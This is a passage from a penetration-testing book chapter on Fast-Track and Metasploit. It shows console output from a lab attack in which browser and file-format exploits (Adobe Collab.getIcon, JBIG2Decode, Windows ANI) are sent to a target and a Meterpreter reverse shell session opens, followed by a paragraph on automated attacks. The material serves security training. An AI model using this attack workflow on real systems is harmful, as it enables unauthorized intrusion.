Chapter 11

NOTE

You could use ARP cache poisoning within this attack, but it will only work when you 
are on the same local and unrestricted subnet as the target.

[*] Local IP: http://10.211.55.130:8071/
[*] Server started.
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8072/
[*] Local IP: http://10.211.55.130:8072/
[*] Server started.
msf exploit(zenturiprogramchecker_unsafe) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8073/
[*] Local IP: http://10.211.55.130:8073/
[*] Server started.

[*] Sending Adobe Collab.getIcon() Buffer Overflow to 10.211.55.128:1044...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 10.211.55.128:1047...
[*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 10.211.55.128:1046...
[*] Sending exploit to 10.211.55.128:1049...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 10.211.55.128:1076...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:9007 -> 10.211.55.128:1077

msf exploit(zenturiprogramchecker_unsafe) > sessions -l

Active sessions
===============

Id  Description  Tunnel
--  -----------  ------
1   Meterpreter  10.211.55.130:9007 -> 10.211.55.128:1077

msf exploit(zenturiprogramchecker_unsafe) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

A Few Words About Automation

Fast-Track offers a plethora of exploitation capabilities that expand upon the 
feature-rich Metasploit Framework. When coupled with Metasploit, it lets you 
use advanced attack vectors to fully control a target machine. Of course, 
automated attack vectors do not always succeed, which is why you must 
understand the system you are attacking and know the attack's chances of 
success before you launch it. If an automated tool fails, your ability to 
perform the tests manually and successfully attack the target system will 
make you a better penetration tester.